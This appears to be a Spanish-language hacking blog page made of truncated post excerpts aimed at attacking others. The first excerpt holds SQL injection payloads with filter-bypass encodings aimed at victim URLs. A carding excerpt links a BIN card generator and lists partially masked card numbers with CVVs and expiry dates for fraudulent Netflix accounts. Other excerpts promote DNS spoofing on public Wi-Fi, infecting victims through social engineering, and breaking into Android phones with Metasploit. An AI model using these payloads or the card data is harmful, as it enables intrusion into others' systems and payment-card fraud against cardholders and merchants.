Mipagina.php?id=12’     /*!50000uNioN*//*!50000sElEcT*/1,2,3,4,5,6--+ Si no da entonce ponemos esta Unión all select 1,1,1,1,1,1-- Forbidden: http://victim.com/php-nuke/?/**/union/**/select….. Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select… Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect… php?id=1+and+1=0+order+by+1 +andHYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"+(HYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"select 1)=(Select 0xAA[..(add about 1000...

Crea tu propia cuentas Eje: Netflix

Puedes Agregar y hacer lo que quieras https://dashboard.stripe.com/ https://temp-mail.org/es/ http://www.sayapro.us/account/ http://rdd.pw/ https://bin2ccgen.com/index.php# Compartelo para que los demas aprendan Bin para todos  MCIG.ORG41472021xxxxxxx7 TELMEX533609701544xxxx CCV: 377 12/16NETFLIX IP Usa533875xxxxxxxx4x 02/16 Ccv:360RKCAMS4037660021xxxxxx. 07/17. Cvv: 087PORRUAS4147 2021 68xx xxxx 12/17 339CINEMEX402766268xxxxxx35512380448xxxxxx...

tecnica peligrosa y muchas siguen usandolas

Con este metodo puedes pensar hacer lo que quieras solo piensa :v Bueno esta es una técnica muy peligrosa,cuando nos conectamos a lados públicos, en donde la conexión a wifi es libre y para miles de usuarios, por ejemplo una universidad. el Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de  nombre, es decir, resolver...

Como muchos le llaman, Hackear Ordenadores..

lo primero que tenemos que hacer es crear el virus y luego enviarlo a la victima  despues que tengamos el virus creado, solo nos queda enviarlo a la persona haciando Ingeniería Social esto fue un ejemplo  entonce ya que tienes todas estas victimas infectadas  puedes hacer con todas estas victimas lo que kieras  ya se por donde vas :D &nbs...

Ataque para Android utilizando Linux

método para Hackear android Hola!  En esté post aprenderás a entrar en un android , con la maravillosa herramienta llamada Metasploit , dirás  ¿Enserio? , se podría entrar en un Android, claro! Empecemos..... 1º.-Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales. 2º.-Una vez hecho eso pondremos en Metasploit lo siguiente.... search...